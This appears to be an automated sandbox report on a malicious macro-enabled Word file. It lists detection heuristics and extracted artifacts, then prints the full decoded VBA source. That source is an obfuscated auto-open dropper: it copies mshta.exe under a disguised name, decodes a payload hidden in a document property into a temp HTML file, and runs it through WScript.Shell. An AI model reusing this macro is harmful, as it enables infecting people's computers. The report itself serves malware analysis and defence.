- Verdict: MALICIOUS
- Risk Score: 138

Heuristics (6):

- ClamAV: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): document contains a VBA project; VBA macros present
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script: `Call CreateObject("ws" + asFOSt + "ell").run(adteU)`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `aEcUJs = Environ(avRPGB)`
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Each of the following URLs was found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8757 bytes | 5e974c9838095dd4503914cc0a493a589681172a71846b8cd816bcbf5c484c00 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aMZs0U"
Sub AutoOpen()
a9AjDY
End Sub
Attribute VB_Name = "aHp7Az"
Public Const a2t7A As String = ""
Public Const aIC82y As Integer = 22230 / 1710
Public Const aVklcx As String = "1ridn1iw1"
Public Const a7iRb As String = "231met1sys1"
Public Const aXY6eU As String = "p1m1e1t"
Public Const asFOSt As String = "cript.sh"
Function aVcl3()
End Function
Sub aKfM0g(aPJc0)
' Yew for remained
' Summit tb
' Doors wizard continues
' Fruition deal
' Amendments fruit xxx cent lancashire
' Backwoods
' Musk throws blackmail printable -on municipality pe
' Ukraine aa faculty proficient mind mulberry
' Dishonesty vip requires
' Lombard papal square
' Mammon fissure
' Twenty-first java
' Prompter
' Vessels asus genealogical
' Clubs architect obsequies
' Terra-cotta academy lurch
' Baltimore bruce twinge chronic
' Asks spurn armstrong kijiji
' Margin moraine weaver enjoyed
' Septuagint retrograde epidermis
' Pin cheap
' Absorb mettle
' Financing find
' Musk unalterable substitution
' Heretic supernumerary msgstr unfavorable
End Sub
Function aMXBLS(atKB0J)
' Cir khaki
aMXBLS = ActiveDocument.BuiltInDocumentProperties(atKB0J)
End Function
Public Sub ayF85A()
aKc0Hd
End Sub
Public Sub a31Mm()
aUvRm
End Sub
Attribute VB_Name = "arSsT"
Public Function af1zOU(asuix, aropPN)
' Spa
' Ranger qualify collation
' Brawl absence brown plastics
' Nonsensical prosperously mince trade bounce
FileNumber = FreeFile
Open asuix For Output As #FileNumber
Print #FileNumber, aropPN
' Cranium occupational claim
Close #FileNumber
End Function
Sub aFVAi(a5vr4X, aEXZD)
' Bosnia antibody nutshell eye graph
' Importantly
' Broth enlarge beneficial ti
' Dates sept whenever
' Medallion depict
' Frames heights planner okay
' Fight variability abolitionists inauguration abbeys
' Young period
' Smoldering jennifer old-time tranny
' Illustration
' Chorus pontiff exasperate grocery
' Sustainable
' Thirty-three elimination
' Clipping fool plugins pages
' Elusive counted
' Dial
' Texas
' Resist rebuild cement generating density
' Sublimedirectory holdem confidant bulletin charwoman boxer
' Bosnia tragedian sql
' Delineate developers
' Pungent somehow
' Credibility stephanie adverted exceptionally
FileCopy a5vr4X, aEXZD
End Sub
Function aEnkW(abWRT)
' Closer
' Ignore
' Debut informal findings white
' Huge del
' Improving baying
' Adam
' Relapse muscles dentists ballot
' Terrorist lending toward
' Holocaust canteen jt varied
' Gauntlet prescription membership jazz bangkok
' Surveillance
aEnkW = abWRT
End Function
Function aQlJP(abWRT) As String
Dim axa83 As Long
Dim aJOgwD As Integer
Dim aGLTF As Integer
For axa83 = 1 To Len(abWRT)
' Shown phillip
' Sully did clap pedantic sic legitimate morocco
' Be-
' Hidden metal invited unsuitable
' Deformity lesson
' Sweden gps offhand espn
' Cause leaflet
' Stoicism
' Welch
' Mobility potential
' Satisfied statistics auntie condos
aGLTF = 0
' Bewitched josh impertinence quaking tobacco sue joel
aIx08R = Mid(abWRT, axa83, 1)
aJOgwD = Asc(aIx08R)
' Volunteer
' Acclamations perspicacity
' Kegs tackle airplane russet
' Quarrelsome vegas
' Imperceptibly arlington verify social metallic cruiser
' Cst botany anatomical transvaal
' Fry scanners
' Observed unacceptable panel lethargic
' Reich interpreted beginning
' Terrify arise continent misleading clicks lovable
' Bevis strengths ballet varnish asus
If (aJOgwD > anrNi2(17038 / 17038) And aJOgwD < anrNi2(30498 / 15249)) Or (aJOgwD > anrNi2(24096 / 8032) And aJOgwD < anrNi2(301 - 297)) Then
aGLTF = aIC82y
' Kingston stack iii fatherhood
' Acumen daddy
' Remedies hypnotic
' Sends literati electronics
' Candidates physicians hewlett slap
' Hard watts fella
' Adorable gray
' Forage
' Self-conscious intervene flaunt
' Reconstruct precipitated apparent hoary
aJOgwD = aTEyJ6(aJOgwD, aGLTF)
' Orb
If aJOgwD < anrNi2(5) And aJOgwD > 83 Then
aJOgwD = aAZOY3(aJOgwD)
ElseIf aJOgwD < -433 + 498 Then
aJOgwD = aAZOY3(aJOgwD)
End If
End If
avSjZ = aHokFV(aJOgwD)
' Claim
' Typewriter i
' Ties docile slime
' Guyana climber mausoleum gust
' Fuse acrimony
' Milky
' Maidenhead camera exhaust regimen
' Omnipresent chandler congregate catering
' Scholarship glad
' Pulp character hughes
' Focus holiday
Mid$(abWRT, axa83, 1) = aEnkW(avSjZ)
Next axa83
aQlJP = abWRT
End Function
Attribute VB_Name = "awsqcS"
Function aW3Bc8(aaeG2c)
' Bewitched mongolian persephone destroyed
aHbwP = aaeG2c
aNVGk = Len(aHbwP)
For acn8i = 0 To aNVGk - 1
aYZ7dX = aYZ7dX & Mid(aHbwP, (aNVGk - acn8i), 1)
Next acn8i
' Fewer certitude
aW3Bc8 = aYZ7dX
End Function
Public Function aZQ0s(ahEwy)
aZQ0s = Replace(ahEwy, a2t7A, "")
End Function
Sub a9AjDY()
' Godhead tricks hurl safeguard fails
' Astrology aunty
' Retrieve denver lint meet justify ranger
' Lurch expect dizziness
' Scoop subjugate living
' Guides chen sd
' Uploaded flag retrograde
' Twenty-seven jesse wrap
' Flexible charm city
' Df hardware northumberland
' Unavoidable handle solidity jj eating caucus
ayF85A
' Secured dollars wi
' Flux bridges registered
' Los melee nil loquacious
' Unconnected
' Wichita
' Tyrol negative abolishing
' Gill manually involve
' Statewide lucknow mete bosnia
' Berkshire devolve andromeda
' Dancer oz worry protein
' Valerian remonstrate
a31Mm
' Literally etruria condescend mazda
' Intact portsmouth schedule trash header
Call CreateObject("ws" + asFOSt + "ell").run(adteU)
End Sub
Attribute VB_Name = "aihus"
Function aEcUJs(avRPGB)
' Kiss meditate ethical sexual
aEcUJs = Environ(avRPGB)
End Function
Function a0lN7()
With Application
a0lN7 = .PathSeparator
End With
End Function
Function a6WwJq(awcQEm)
' Italy schema
' Counterpoise borough cologne vg
' Judgement saline
' Err
' Perishing rendered
' Unfeeling substantial qv match
' Cvs newly
' Cumulative
' Credulous italian coasting dawning
' Tho
' Aside awkwardly
aaxinT = VBA.Split(aW3Bc8("lmth.ni|moc.ni|exe.athsm"), "|")
' Chrysler co-operative
' Recast dauphin oracle treble
' Fifty-one frederick
' Ad ids dividend
' Standstill discipline finland
' Eighty-six tuner the
' Musician outreach pixel forsooth
' Mongolian eye-witness certification plumage evanescence
' Oscillation coldest bradford bolivia
' Carver servitor transmission
' Quantities
' Dimmer verona
Select Case awcQEm
' Pauses watchman uzbekistan fillet reflects
' Spawn fragrances prematurely vault
' Intelligent
' Shower
' Promptly narcissus scholarships practical
' Sew calculations
' Juno walks faggot
' Wn designate
' Warp
' Dave unencumbered
' Restaurant dress coasted
' All fatherland mystified
Case 0:
a6WwJq = aEcUJs(Replace(aW3Bc8(aVklcx), "1", "")) & a0lN7 & Replace(aW3Bc8(a7iRb), "1", "") & a0lN7 & aaxinT(0)
Case 1:
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & aaxinT(1)
Case 2:
' Discharging
' Candidate untitled
' Spinach fix provisionally beautiful fe
' Apostolic itch whiles aspirant engineer builders
' Clinic meme artificial
' Reversal converging
' Machinery lives
' Nicaragua unafraid
' Midsummer
' Misunderstand
' Mutter packages whiz
a6WwJq = aEcUJs(Replace(aW3Bc8(aXY6eU), "1", "")) & a0lN7 & aaxinT(2)
End Select
End Function
Sub aUvRm()
aZObBH = aixC6O(a6WwJq(2))
af1zOU aZObBH, aQlJP(aMXBLS("category"))
End Sub
Attribute VB_Name = "a1n3Ns"
Function a4xYX(aQ42Od)
a4xYX = (aZQ0s(aQ42Od))
End Function
Function a01mq(avujU)
' Cockney washington cute
a01mq = (aZQ0s(avujU))
End Function
Function aixC6O(ajTif)
aixC6O = (aZQ0s(ajTif))
End Function
Function adteU()
aLkGNl = a01mq(a6WwJq(1))
a7n6T = aixC6O(a6WwJq(2))
adteU = aLkGNl & " " & a7n6T
End Function
Attribute VB_Name = "aTy64"
Sub aKc0Hd()
aiOuYv = a4xYX(a6WwJq(0))
asxbNQ = a01mq(a6WwJq(1))
aFVAi aiOuYv, asxbNQ
End Sub
Function aAZOY3(a7yzC)
aAZOY3 = a7yzC + 4628 / 178
End Function
Function anrNi2(aGrcvw)
If aGrcvw = 0 Then
anrNi2 = -23986 + 23987
ElseIf aGrcvw = 1 Then
anrNi2 = -41 + 105
ElseIf aGrcvw = 2 Then
anrNi2 = 16 + 75
ElseIf aGrcvw = 3 Then
anrNi2 = -153 + 249
ElseIf aGrcvw = 4 Then
anrNi2 = 327 - 204
ElseIf aGrcvw = 5 Then
anrNi2 = -211 + 308
Else
anrNi2 = 128 * 8
End If
End Function
Function aTEyJ6(a7yzC, ayXNgh)
aTEyJ6 = a7yzC - ayXNgh
End Function
Function aHokFV(a7yzC)
aHokFV = VBA.ChrW(a7yzC)
End Function
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 42496 bytes | 8b674d26bc86854fdc36437241d643559afc39cb54d4e89a88f4962207b0195a |